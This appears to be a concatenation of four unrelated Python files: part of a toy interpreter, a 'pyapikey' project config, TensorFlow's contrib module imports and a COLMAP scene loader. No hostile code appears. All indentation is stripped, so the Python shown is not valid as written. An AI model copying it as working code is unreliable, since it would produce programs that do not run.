f"Expected identifier"
))
arg_name_toks.append(self.current_tok)
res.register_advancement()
self.advance()
if self.current_tok.type != TT_RPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected ',' or ')'"
))
else:
if self.current_tok.type != TT_RPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected identifier or ')'"
))
res.register_advancement()
self.advance()
if self.current_tok.type != TT_ARROW:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected '->'"
))
res.register_advancement()
self.advance()
node_to_return = res.register(self.expr())
if res.error: return res
return res.success(FuncDefNode(
var_name_tok,
arg_name_toks,
node_to_return
))
###################################
def bin_op(self, func_a, ops, func_b=None):
if func_b == None:
func_b = func_a
res = ParseResult()
left = res.register(func_a())
if res.error: return res
while self.current_tok.type in ops or (self.current_tok.type, self.current_tok.value) in ops:
op_tok = self.current_tok
res.register_advancement()
self.advance()
right = res.register(func_b())
if res.error: return res
left = BinOpNode(left, op_tok, right)
return res.success(left)
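# Parser usage sketch (illustrative only): the Lexer's token stream is turned
# into an AST whose repr mirrors operator precedence, e.g.
#
#   tokens, _ = Lexer('<stdin>', '1 + 2 * 3').make_tokens()
#   ast = Parser(tokens).parse()
#   # ast.node -> (INT:1, PLUS, (INT:2, MUL, INT:3))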
#######################################
# RUNTIME RESULT
#######################################
class RTResult:
def __init__(self):
self.value = None
self.error = None
def register(self, res):
self.error = res.error
return res.value
def success(self, value):
self.value = value
return self
def failure(self, error):
self.error = error
return self
#######################################
# VALUES
#######################################
class Value:
def __init__(self):
self.set_pos()
self.set_context()
def set_pos(self, pos_start=None, pos_end=None):
self.pos_start = pos_start
self.pos_end = pos_end
return self
def set_context(self, context=None):
self.context = context
return self
def added_to(self, other):
return None, self.illegal_operation(other)
def subbed_by(self, other):
return None, self.illegal_operation(other)
def multed_by(self, other):
return None, self.illegal_operation(other)
def dived_by(self, other):
return None, self.illegal_operation(other)
def powed_by(self, other):
return None, self.illegal_operation(other)
def get_comparison_eq(self, other):
return None, self.illegal_operation(other)
def get_comparison_ne(self, other):
return None, self.illegal_operation(other)
def get_comparison_lt(self, other):
return None, self.illegal_operation(other)
def get_comparison_gt(self, other):
return None, self.illegal_operation(other)
def get_comparison_lte(self, other):
return None, self.illegal_operation(other)
def get_comparison_gte(self, other):
return None, self.illegal_operation(other)
def anded_by(self, other):
return None, self.illegal_operation(other)
def ored_by(self, other):
return None, self.illegal_operation(other)
def notted(self):
return None, self.illegal_operation()
def execute(self, args):
return RTResult().failure(self.illegal_operation())
def copy(self):
raise Exception('No copy method defined')
def is_true(self):
return False
def illegal_operation(self, other=None):
if not other: other = self
return RTError(
self.pos_start, other.pos_end,
'Illegal operation',
self.context
)
class Number(Value):
def __init__(self, value):
super().__init__()
self.value = value
def added_to(self, other):
if isinstance(other, Number):
return Number(self.value + other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def subbed_by(self, other):
if isinstance(other, Number):
return Number(self.value - other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def multed_by(self, other):
if isinstance(other, Number):
return Number(self.value * other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def dived_by(self, other):
if isinstance(other, Number):
if other.value == 0:
return None, RTError(
other.pos_start, other.pos_end,
'Division by zero',
self.context
)
return Number(self.value / other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def powed_by(self, other):
if isinstance(other, Number):
return Number(self.value ** other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_eq(self, other):
if isinstance(other, Number):
return Number(int(self.value == other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_ne(self, other):
if isinstance(other, Number):
return Number(int(self.value != other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_lt(self, other):
if isinstance(other, Number):
return Number(int(self.value < other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_gt(self, other):
if isinstance(other, Number):
return Number(int(self.value > other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_lte(self, other):
if isinstance(other, Number):
return Number(int(self.value <= other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_gte(self, other):
if isinstance(other, Number):
return Number(int(self.value >= other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def anded_by(self, other):
if isinstance(other, Number):
return Number(int(self.value and other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def ored_by(self, other):
if isinstance(other, Number):
return Number(int(self.value or other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def notted(self):
return Number(1 if self.value == 0 else 0).set_context(self.context), None
def copy(self):
copy = Number(self.value)
copy.set_pos(self.pos_start, self.pos_end)
copy.set_context(self.context)
return copy
def is_true(self):
return self.value != 0
def __repr__(self):
return str(self.value)
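# Value-protocol sketch (illustrative only): arithmetic methods return a
# (result, error) pair instead of raising, e.g.
#
#   Number(6).dived_by(Number(3))   # -> (Number 2.0, None)
#   Number(6).dived_by(Number(0))   # -> (None, RTError: Division by zero)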
class Function(Value):
def __init__(self, name, body_node, arg_names):
super().__init__()
self.name = name or "<anonymous>"
self.body_node = body_node
self.arg_names = arg_names
def execute(self, args):
res = RTResult()
interpreter = Interpreter()
new_context = Context(self.name, self.context, self.pos_start)
new_context.symbol_table = SymbolTable(new_context.parent.symbol_table)
if len(args) > len(self.arg_names):
return res.failure(RTError(
self.pos_start, self.pos_end,
f"{len(args) - len(self.arg_names)} too many args passed into '{self.name}'",
self.context
))
if len(args) < len(self.arg_names):
return res.failure(RTError(
self.pos_start, self.pos_end,
f"{len(self.arg_names) - len(args)} too few args passed into '{self.name}'",
self.context
))
for i in range(len(args)):
arg_name = self.arg_names[i]
arg_value = args[i]
arg_value.set_context(new_context)
new_context.symbol_table.set(arg_name, arg_value)
value = res.register(interpreter.visit(self.body_node, new_context))
if res.error: return res
return res.success(value)
def copy(self):
copy = Function(self.name, self.body_node, self.arg_names)
copy.set_context(self.context)
copy.set_pos(self.pos_start, self.pos_end)
return copy
def __repr__(self):
return f"<function {self.name}>"
#######################################
# CONTEXT
#######################################
class Context:
def __init__(self, display_name, parent=None, parent_entry_pos=None):
self.display_name = display_name
self.parent = parent
self.parent_entry_pos = parent_entry_pos
self.symbol_table = None
#######################################
# SYMBOL TABLE
#######################################
class SymbolTable:
def __init__(self, parent=None):
self.symbols = {}
self.parent = parent
def get(self, name):
value = self.symbols.get(name, None)
if value == None and self.parent:
return self.parent.get(name)
return value
def set(self, name, value):
self.symbols[name] = value
def remove(self, name):
del self.symbols[name]
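# SymbolTable sketch (illustrative only): lookups fall back to the parent
# table, which is how function bodies see globals while keeping locals private.
#
#   parent = SymbolTable(); parent.set("x", Number(1))
#   child = SymbolTable(parent)
#   # child.get("x") -> Number 1; child.set("x", Number(2)) only shadows it locally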
#######################################
# INTERPRETER
#######################################
class Interpreter:
def visit(self, node, context):
method_name = f'visit_{type(node).__name__}'
method = getattr(self, method_name, self.no_visit_method)
return method(node, context)
def no_visit_method(self, node, context):
raise Exception(f'No visit_{type(node).__name__} method defined')
###################################
def visit_NumberNode(self, node, context):
return RTResult().success(
Number(node.tok.value).set_context(context).set_pos(node.pos_start, node.pos_end)
)
def visit_VarAccessNode(self, node, context):
res = RTResult()
var_name = node.var_name_tok.value
value = context.symbol_table.get(var_name)
if not value:
return res.failure(RTError(
node.pos_start, node.pos_end,
f"'{var_name}' is not defined",
context
))
value = value.copy().set_pos(node.pos_start, node.pos_end)
return res.success(value)
def visit_VarAssignNode(self, node, context):
res = RTResult()
var_name = node.var_name_tok.value
value = res.register(self.visit(node.value_node, context))
if res.error: return res
context.symbol_table.set(var_name, value)
return res.success(value)
def visit_BinOpNode(self, node, context):
res = RTResult()
left = res.register(self.visit(node.left_node, context))
if res.error: return res
right = res.register(self.visit(node.right_node, context))
if res.error: return res
if node.op_tok.type == TT_PLUS:
result, error = left.added_to(right)
elif node.op_tok.type == TT_MINUS:
result, error = left.subbed_by(right)
elif node.op_tok.type == TT_MUL:
result, error = left.multed_by(right)
elif node.op_tok.type == TT_DIV:
result, error = left.dived_by(right)
elif node.op_tok.type == TT_POW:
result, error = left.powed_by(right)
elif node.op_tok.type == TT_EE:
result, error = left.get_comparison_eq(right)
elif node.op_tok.type == TT_NE:
result, error = left.get_comparison_ne(right)
elif node.op_tok.type == TT_LT:
result, error = left.get_comparison_lt(right)
elif node.op_tok.type == TT_GT:
result, error = left.get_comparison_gt(right)
elif node.op_tok.type == TT_LTE:
result, error = left.get_comparison_lte(right)
elif node.op_tok.type == TT_GTE:
result, error = left.get_comparison_gte(right)
elif node.op_tok.matches(TT_KEYWORD, 'AND'):
result, error = left.anded_by(right)
elif node.op_tok.matches(TT_KEYWORD, 'OR'):
result, error = left.ored_by(right)
if error:
return res.failure(error)
else:
return res.success(result.set_pos(node.pos_start, node.pos_end))
def visit_UnaryOpNode(self, node, context):
res = RTResult()
number = res.register(self.visit(node.node, context))
if res.error: return res
error = None
if node.op_tok.type == TT_MINUS:
number, error = number.multed_by(Number(-1))
elif node.op_tok.matches(TT_KEYWORD, 'NOT'):
number, error = number.notted()
if error:
return res.failure(error)
else:
return res.success(number.set_pos(node.pos_start, node.pos_end))
def visit_IfNode(self, node, context):
res = RTResult()
for condition, expr in node.cases:
condition_value = res.register(self.visit(condition, context))
if res.error: return res
if condition_value.is_true():
expr_value = res.register(self.visit(expr, context))
if res.error: return res
return res.success(expr_value)
if node.else_case:
else_value = res.register(self.visit(node.else_case, context))
if res.error: return res
return res.success(else_value)
return res.success(None)
def visit_ForNode(self, node, context):
res = RTResult()
start_value = res.register(self.visit(node.start_value_node, context))
if res.error: return res
end_value = res.register(self.visit(node.end_value_node, context))
if res.error: return res
if node.step_value_node:
step_value = res.register(self.visit(node.step_value_node, context))
if res.error: return res
else:
step_value = Number(1)
i = start_value.value
if step_value.value >= 0:
condition = lambda: i < end_value.value
else:
condition = lambda: i > end_value.value
while condition():
context.symbol_table.set(node.var_name_tok.value, Number(i))
i += step_value.value
res.register(self.visit(node.body_node, context))
if res.error: return res
return res.success(None)
def visit_WhileNode(self, node, context):
res = RTResult()
while True:
condition = res.register(self.visit(node.condition_node, context))
if res.error: return res
if not condition.is_true(): break
res.register(self.visit(node.body_node, context))
if res.error: return res
return res.success(None)
def visit_FuncDefNode(self, node, context):
res = RTResult()
func_name = node.var_name_tok.value if node.var_name_tok else None
body_node = node.body_node
arg_names = [arg_name.value for arg_name in node.arg_name_toks]
func_value = Function(func_name, body_node, arg_names).set_context(context).set_pos(node.pos_start, node.pos_end)
if node.var_name_tok:
context.symbol_table.set(func_name, func_value)
return res.success(func_value)
def visit_CallNode(self, node, context):
res = RTResult()
args = []
value_to_call = res.register(self.visit(node.node_to_call, context))
if res.error: return res
value_to_call = value_to_call.copy().set_pos(node.pos_start, node.pos_end)
for arg_node in node.arg_nodes:
args.append(res.register(self.visit(arg_node, context)))
if res.error: return res
return_value = res.register(value_to_call.execute(args))
if res.error: return res
return res.success(return_value)
#######################################
# RUN
#######################################
global_symbol_table = SymbolTable()
global_symbol_table.set("NULL", Number(0))
global_symbol_table.set("FALSE", Number(0))
global_symbol_table.set("TRUE", Number(1))
def run(fn, text):
# Generate tokens
lexer = Lexer(fn, text)
tokens, error = lexer.make_tokens()
if error: return None, error
# Generate AST
parser = Parser(tokens)
ast = parser.parse()
if ast.error: return None, ast.error
# Run program
interpreter = Interpreter()
context = Context('<program>')
context.symbol_table = global_symbol_table
result = interpreter.visit(ast.node, context)
return result.value, result.error
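# End-to-end sketch (illustrative only; a REPL wrapper is not part of this file):
#
#   result, error = run('<stdin>', 'IF 1 == 1 THEN 2 ELSE 3')   # -> Number 2, None
#   result, error = run('<stdin>', 'VAR add = FUN (a, b) -> a + b')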
|
import pyclassifiers.values
import config.general
import config.helpers
project_github_username = "veltzer"
project_name = "pyapikey"
github_repo_name = project_name
project_website = f"https://{project_github_username}.github.io/{project_name}"
project_website_source = f"https://github.com/{project_github_username}/{project_name}"
project_website_git = f"git://github.com/{project_github_username}/{project_name}.git"
project_website_download_ppa = "https://launchpad.net/~mark-veltzer/+archive/ubuntu/ppa"
project_website_download_src = project_website_source
# project_paypal_donate_button_id="ASPRXR59H2NTQ"
# project_google_analytics_tracking_id="UA-56436979-1"
project_long_description = "access api keys from code"
project_short_description = project_long_description
# keywords to put on html pages or for search; don't put the name of the project or my details
# as they will be added automatically...
project_keywords = [
"api",
"key",
"python",
"secret",
]
project_license = "MIT"
project_year_started = "2020"
project_description = project_long_description
project_platforms = [
"python3",
]
project_classifiers = [
pyclassifiers.values.DevelopmentStatus__4_Beta,
pyclassifiers.values.Environment__Console,
pyclassifiers.values.OperatingSystem__OSIndependent,
pyclassifiers.values.ProgrammingLanguage__Python,
pyclassifiers.values.ProgrammingLanguage__Python__3,
pyclassifiers.values.ProgrammingLanguage__Python__3__Only,
pyclassifiers.values.ProgrammingLanguage__Python__36,
pyclassifiers.values.ProgrammingLanguage__Python__37,
pyclassifiers.values.ProgrammingLanguage__Python__38,
pyclassifiers.values.Topic__Utilities,
pyclassifiers.values.License__OSIApproved__MITLicense,
]
project_data_files = []
project_google_analytics_tracking_id = None
project_paypal_donate_button_id = None
codacy_id = None
project_copyright_years = config.helpers.get_copyright_years(project_year_started)
project_google_analytics_snipplet = config.helpers.get_google_analytics(project_google_analytics_tracking_id)
project_paypal_donate_button_snipplet = config.helpers.get_paypal(project_paypal_donate_button_id)
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""contrib module containing volatile or experimental code."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Add projects here, they will show up under tf.contrib.
from tensorflow.contrib import bayesflow
from tensorflow.contrib import cloud
from tensorflow.contrib import compiler
from tensorflow.contrib import copy_graph
from tensorflow.contrib import crf
from tensorflow.contrib import cudnn_rnn
from tensorflow.contrib import data
from tensorflow.contrib import deprecated
from tensorflow.contrib import distributions
from tensorflow.contrib import factorization
from tensorflow.contrib import framework
from tensorflow.contrib import graph_editor
from tensorflow.contrib import grid_rnn
from tensorflow.contrib import image
from tensorflow.contrib import input_pipeline
from tensorflow.contrib import integrate
from tensorflow.contrib import keras
from tensorflow.contrib import kernel_methods
from tensorflow.contrib import labeled_tensor
from tensorflow.contrib import layers
from tensorflow.contrib import learn
from tensorflow.contrib import legacy_seq2seq
from tensorflow.contrib import linalg
from tensorflow.contrib import linear_optimizer
from tensorflow.contrib import lookup
from tensorflow.contrib import losses
from tensorflow.contrib import memory_stats
from tensorflow.contrib import metrics
from tensorflow.contrib import nccl
from tensorflow.contrib import nn
from tensorflow.contrib import opt
from tensorflow.contrib import quantization
from tensorflow.contrib import resampler
from tensorflow.contrib import rnn
from tensorflow.contrib import saved_model
from tensorflow.contrib import seq2seq
from tensorflow.contrib import signal
from tensorflow.contrib import slim
from tensorflow.contrib import solvers
from tensorflow.contrib import sparsemax
from tensorflow.contrib import staging
from tensorflow.contrib import stat_summarizer
from tensorflow.contrib import stateless
from tensorflow.contrib import tensor_forest
from tensorflow.contrib import tensorboard
from tensorflow.contrib import testing
from tensorflow.contrib import tfprof
from tensorflow.contrib import timeseries
from tensorflow.contrib import tpu
from tensorflow.contrib import training
from tensorflow.contrib import util
from tensorflow.contrib.ndlstm import python as ndlstm
from tensorflow.contrib.remote_fused_graph import pylib as remote_fused_graph
from tensorflow.contrib.specs import python as specs
from tensorflow.python.util.lazy_loader import LazyLoader
ffmpeg = LazyLoader("ffmpeg",
globals(), "tensorflow.contrib.ffmpeg")
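# Lazy-import sketch (illustrative only): the ffmpeg module is resolved on
# first attribute access, e.g. touching tf.contrib.ffmpeg.decode_audio triggers
# the actual import, so a plain "import tensorflow" stays cheaper.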
del LazyLoader
del absolute_import
del division
del print_function
|
# Author: True Price <jtprice at cs.unc.edu>
from collections import OrderedDict, defaultdict
from io import StringIO
from itertools import combinations
import os
import struct
from .camera import Camera
from .image import Image
import numpy as np
from .rotation import Quaternion
# -------------------------------------------------------------------------------
#
# SceneManager
#
# -------------------------------------------------------------------------------
class SceneManager:
INVALID_POINT3D = np.uint64(-1)
def __init__(self, colmap_results_folder, image_path=None):
self.folder = colmap_results_folder
if not self.folder.endswith("/"):
self.folder += "/"
self.image_path = None
self.load_colmap_project_file(image_path=image_path)
self.cameras = OrderedDict()
self.images = OrderedDict()
self.name_to_image_id = dict()
self.last_camera_id = 0
self.last_image_id = 0
# Nx3 array of point3D xyz's
self.points3D = np.zeros((0, 3))
# for each element in points3D, stores the id of the point
self.point3D_ids = np.empty(0)
# point3D_id => index in self.points3D
self.point3D_id_to_point3D_idx = dict()
# point3D_id => [(image_id, point2D idx in image)]
self.point3D_id_to_images = dict()
self.point3D_colors = np.zeros((0, 3), dtype=np.uint8)
self.point3D_errors = np.zeros(0)
# ---------------------------------------------------------------------------
def load_colmap_project_file(self, project_file=None, image_path=None):
if project_file is None:
project_file = self.folder + "project.ini"
self.image_path = image_path
if self.image_path is None:
try:
with open(project_file, "r") as f:
for line in iter(f.readline, ""):
if line.startswith("image_path"):
self.image_path = line[11:].strip()
break
except:
pass
if self.image_path is None:
print("Warning: image_path not found for reconstruction")
elif not self.image_path.endswith("/"):
self.image_path += "/"
# ---------------------------------------------------------------------------
def load(self):
self.load_cameras()
self.load_images()
self.load_points3D()
# ---------------------------------------------------------------------------
def load_cameras(self, input_file=None):
if input_file is None:
input_file = self.folder + "cameras.bin"
if os.path.exists(input_file):
self._load_cameras_bin(input_file)
else:
input_file = self.folder + "cameras.txt"
if os.path.exists(input_file):
self._load_cameras_txt(input_file)
else:
raise IOError("no cameras file found")
def _load_cameras_bin(self, input_file):
self.cameras = OrderedDict()
with open(input_file, "rb") as f:
num_cameras = struct.unpack("L", f.read(8))[0]
for _ in range(num_cameras):
camera_id, camera_type, w, h = struct.unpack("IiLL", f.read(24))
num_params = Camera.GetNumParams(camera_type)
params = struct.unpack("d" * num_params, f.read(8 * num_params))
self.cameras[camera_id] = Camera(camera_type, w, h, params)
self.last_camera_id = max(self.last_camera_id, camera_id)
def _load_cameras_txt(self, input_file):
self.cameras = OrderedDict()
with open(input_file, "r") as f:
for line in iter(lambda: f.readline().strip(), ""):
if not line or line.startswith("#"):
continue
data = line.split()
camera_id = int(data[0])
self.cameras[camera_id] = Camera(
data[1], int(data[2]), int(data[3]), list(map(float, data[4:]))
)
self.last_camera_id = max(self.last_camera_id, camera_id)
# ---------------------------------------------------------------------------
def load_images(self, input_file=None):
if input_file is None:
input_file = self.folder + "images.bin"
if os.path.exists(input_file):
self._load_images_bin(input_file)
else:
input_file = self.folder + "images.txt"
if os.path.exists(input_file):
self._load_images_txt(input_file)
else:
raise IOError("no images file found")
def _load_images_bin(self, input_file):
self.images = OrderedDict()
with open(input_file, "rb") as f:
num_images = struct.unpack("L", f.read(8))[0]
for _ in range(num_images):
image_id = struct.unpack("I", f.read(4))[0]
q = Quaternion(np.array(struct.unpack("dddd", f.read(32))))
t = np.array(struct.unpack("ddd", f.read(24)))
camera_id = struct.unpack("I", f.read(4))[0]
name = b"".join(c for c in iter(lambda: f.read(1), b"\x00")).decode()
image = Image(name, camera_id, q, t)
num_points2D = struct.unpack("L", f.read(8))[0]
image.points2D = np.empty((num_points2D, 2))
image.point3D_ids = np.empty(num_points2D, dtype=np.uint64)
for j in range(num_points2D):
image.points2D[j] = np.array(struct.unpack("dd", f.read(16)))
image.point3D_ids[j] = np.array(struct.unpack("Q", f.read(8)))
self.images[image_id] = image
self.name_to_image_id[image.name] = image_id
self.last_image_id = max(self.last_image_id, image_id)
def _load_images_txt(self, input_file):
self.images = OrderedDict()
with open(input_file, "r") as f:
is_camera_description_line = False
for line in iter(lambda: f.readline().strip(), ""):
if not line or line.startswith("#"):
continue
is_camera_description_line = not is_camera_description_line
data = line.split()
if is_camera_description_line:
image_id = int(data[0])
image = Image(
data[-1],
int(data[-2]),
Quaternion(np.array(list(map(float, data[1:5])))),
np.array(list(map(float, data[5:8]))),
)
else:
image.points2D = np.array(
[list(map(float, data[::3])), list(map(float, data[1::3]))]
).T
image.point3D_ids = np.array(list(map(np.uint64, data[2::3])))
# automatically remove points without an associated 3D point
# mask = (image.point3D_ids != SceneManager.INVALID_POINT3D)
# image.points2D = image.points2D[mask]
# image.point3D_ids = image.point3D_ids[mask]
self.images[image_id] = image
self.name_to_image_id[image.name] = image_id
self.last_image_id = max(self.last_image_id, image_id)
# ---------------------------------------------------------------------------
def load_points3D(self, input_file=None):
if input_file is None:
input_file = self.folder + "points3D.bin"
if os.path.exists(input_file):
self._load_points3D_bin(input_file)
else:
input_file = self.folder + "points3D.txt"
if os.path.exists(input_file):
self._load_points3D_txt(input_file)
else:
raise IOError("no points3D file found")
def _load_points3D_bin(self, input_file):
with open(input_file, "rb") as f:
num_points3D = struct.unpack("L", f.read(8))[0]
self.points3D = np.empty((num_points3D, 3))
self.point3D_ids = np.empty(num_points3D, dtype=np.uint64)
self.point3D_colors = np.empty((num_points3D, 3), dtype=np.uint8)
self.point3D_id_to_point3D_idx = dict()
self.point3D_id_to_images = dict()
self.point3D_errors = np.empty(num_points3D)
for i in range(num_points3D):
self.point3D_ids[i] = struct.unpack("L", f.read(8))[0]
self.points3D[i] = struct.unpack("ddd", f.read(24))
self.point3D_colors[i] = struct.unpack("BBB", f.read(3))
self.point3D_errors[i] = struct.unpack("d", f.read(8))[0]
self.point3D_id_to_point3D_idx[self.point3D_ids[i]] = i
# load (image id, point2D idx) pairs
track_len = struct.unpack("L", f.read(8))[0]
data = struct.unpack("I" * (2 * track_len), f.read(2 * track_len * 4))
self.point3D_id_to_images[self.point3D_ids[i]] = np.array(
data, dtype=np.uint32
).reshape(track_len, 2)
def _load_points3D_txt(self, input_file):
self.points3D = []
self.point3D_ids = []
self.point3D_colors = []
self.point3D_id_to_point3D_idx = dict()
self.point3D_id_to_images = dict()
self.point3D_errors = []
with open(input_file, "r") as f:
for line in iter(lambda: f.readline().strip(), ""):
if not line or line.startswith("#"):
continue
data = line.split()
point3D_id = np.uint64(data[0])
self.point3D_ids.append(point3D_id)
self.point3D_id_to_point3D_idx[point3D_id] = len(self.points3D)
self.points3D.append(list(map(np.float64, data[1:4])))
self.point3D_colors.append(list(map(np.uint8, data[4:7])))
self.point3D_errors.append(np.float64(data[7]))
# load (image id, point2D idx) pairs
self.point3D_id_to_images[point3D_id] = np.array(
list(map(np.uint32, data[8:]))
).reshape(-1, 2)
self.points3D = np.array(self.points3D)
self.point3D_ids = np.array(self.point3D_ids)
self.point3D_colors = np.array(self.point3D_colors)
self.point3D_errors = np.array(self.point3D_errors)
# ---------------------------------------------------------------------------
def save(self, output_folder, binary=True):
self.save_cameras(output_folder, binary=binary)
self.save_images(output_folder, binary=binary)
self.save_points3D(output_folder, binary=binary)
# ---------------------------------------------------------------------------
def save_cameras(self, output_folder, output_file=None, binary=True):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
if output_file is None:
output_file = "cameras.bin" if binary else "cameras.txt"
output_file = os.path.join(output_folder, output_file)
if binary:
self._save_cameras_bin(output_file)
else:
self._save_cameras_txt(output_file)
def _save_cameras_bin(self, output_file):
with open(output_file, "wb") as fid:
fid.write(struct.pack("L", len(self.cameras)))
camera_struct = struct.Struct("IiLL")
for camera_id, camera in sorted(self.cameras.items()):
fid.write(
camera_struct.pack(
camera_id, camera.camera_type, camera.width, camera.height
)
)
# TODO (True): should move this into the Camera class
fid.write(camera.get_params().tobytes())
def _save_cameras_txt(self, output_file):
with open(output_file, "w") as fid:
print("# Camera list with one line of data per camera:", file=fid)
print("# CAMERA_ID, MODEL, WIDTH, HEIGHT, PARAMS[]", file=fid)
print("# Number of cameras:", len(self.cameras), file=fid)
for camera_id, camera in sorted(self.cameras.items()):
print(camera_id, camera, file=fid)
# ---------------------------------------------------------------------------
def save_images(self, output_folder, output_file=None, binary=True):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
if output_file is None:
output_file = "images.bin" if binary else "images.txt"
output_file = os.path.join(output_folder, output_file)
if binary:
self._save_images_bin(output_file)
else:
self._save_images_txt(output_file)
def _save_images_bin(self, output_file):
with open(output_file, "wb") as fid:
fid.write(struct.pack("L", len(self.images)))
for image_id, image in self.images.items():
fid.write(struct.pack("I", image_id))
fid.write(image.q.q.tobytes())
fid.write(image.tvec.tobytes())
fid.write(struct.pack("I", image.camera_id))
fid.write(image.name.encode() + b"\x00")
fid.write(struct.pack("L", len(image.points2D)))
data = np.rec.fromarrays(
(image.points2D[:, 0], image.points2D[:, 1], image.point3D_ids)
)
fid.write(data.tobytes())
def _save_images_txt(self, output_file):
with open(output_file, "w") as fid:
print("# Image list with two lines of data per image:", file=fid)
print("# IMAGE_ID, QW, QX, QY, QZ, TX, TY, TZ, CAMERA_ID, NAME", file=fid)
print("# POINTS2D[] as (X, Y, POINT3D_ID)", file=fid)
print("# Number of images: {},".format(len(self.images)), file=fid)
print("# mean observations per image: unknown", file=fid)
for image_id, image in self.images.items():
print(image_id, file=fid, end=" ")
print(" ".join(str(qi) for qi in image.q.q), file=fid, end=" ")
print(" ".join(str(ti) for ti in image.tvec), file=fid, end=" ")
print(image.camera_id, image.name, file=fid)
data = np.rec.fromarrays(
(
image.points2D[:, 0],
image.points2D[:, 1],
image.point3D_ids.astype(np.int64),
)
)
if len(data) > 0:
np.savetxt(fid, data, "%.2f %.2f %d", newline=" ")
fid.seek(-1, os.SEEK_CUR)
fid.write("\n")
# ---------------------------------------------------------------------------
def save_points3D(self, output_folder, output_file=None, binary=True):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
if output_file is None:
output_file = "points3D.bin" if binary else "points3D.txt"
output_file = os.path.join(output_folder, output_file)
if binary:
self._save_points3D_bin(output_file)
else:
self._save_points3D_txt(output_file)
def _save_points3D_bin(self, output_file):
num_valid_points3D = sum(
1
for point3D_idx in self.point3D_id_to_point3D_idx.values()
if point3D_idx != SceneManager.INVALID_POINT3D
)
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
with open(output_file, "wb") as fid:
fid.write(struct.pack("L", num_valid_points3D))
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
fid.write(struct.pack("L", point3D_id))
fid.write(self.points3D[point3D_idx].tobytes())
fid.write(self.point3D_colors[point3D_idx].tobytes())
fid.write(self.point3D_errors[point3D_idx].tobytes())
fid.write(struct.pack("L", len(self.point3D_id_to_images[point3D_id])))
fid.write(self.point3D_id_to_images[point3D_id].tobytes())
def _save_points3D_txt(self, output_file):
num_valid_points3D = sum(
1
for point3D_idx in self.point3D_id_to_point3D_idx.values()
if point3D_idx != SceneManager.INVALID_POINT3D
)
array_to_string = lambda arr: " ".join(str(x) for x in arr)
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
with open(output_file, "w") as fid:
print("# 3D point list with one line of data per point:", file=fid)
print("# POINT3D_ID, X, Y, Z, R, G, B, ERROR, TRACK[] as ", file=fid)
print("# (IMAGE_ID, POINT2D_IDX)", file=fid)
print("# Number of points: {},".format(num_valid_points3D), file=fid)
print("# mean track length: unknown", file=fid)
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
print(point3D_id, file=fid, end=" ")
print(array_to_string(self.points3D[point3D_idx]), file=fid, end=" ")
print(array_to_string(self.point3D_colors[point3D_idx]), file=fid, end=" ")
print(self.point3D_errors[point3D_idx], file=fid, end=" ")
print(
array_to_string(self.point3D_id_to_images[point3D_id].flat),
file=fid,
)
# ---------------------------------------------------------------------------
# return the image id associated with a given image file
def get_image_from_name(self, image_name):
image_id = self.name_to_image_id[image_name]
return image_id, self.images[image_id]
# ---------------------------------------------------------------------------
def get_camera(self, camera_id):
return self.cameras[camera_id]
# ---------------------------------------------------------------------------
def get_points3D(self, image_id, return_points2D=True, return_colors=False):
image = self.images[image_id]
mask = image.point3D_ids != SceneManager.INVALID_POINT3D
point3D_idxs = np.array(
[
self.point3D_id_to_point3D_idx[point3D_id]
for point3D_id in image.point3D_ids[mask]
]
)
# detect filtered points
filter_mask = point3D_idxs != SceneManager.INVALID_POINT3D
point3D_idxs = point3D_idxs[filter_mask]
result = [self.points3D[point3D_idxs, :]]
if return_points2D:
mask[mask] &= filter_mask
result += [image.points2D[mask]]
if return_colors:
result += [self.point3D_colors[point3D_idxs, :]]
return result if len(result) > 1 else result[0]
# ---------------------------------------------------------------------------
def point3D_valid(self, point3D_id):
return (
self.point3D_id_to_point3D_idx[point3D_id] != SceneManager.INVALID_POINT3D
)
# ---------------------------------------------------------------------------
def get_filtered_points3D(self, return_colors=False):
point3D_idxs = [
idx
for idx in self.point3D_id_to_point3D_idx.values()
if idx != SceneManager.INVALID_POINT3D
]
result = [self.points3D[point3D_idxs, :]]
if return_colors:
result += [self.point3D_colors[point3D_idxs, :]]
return result if len(result) > 1 else result[0]
# ---------------------------------------------------------------------------
# return 3D points shared by two images
def get_shared_points3D(self, image_id1, image_id2):
point3D_ids = set(self.images[image_id1].point3D_ids) & set(
self.images[image_id2].point3D_ids
)
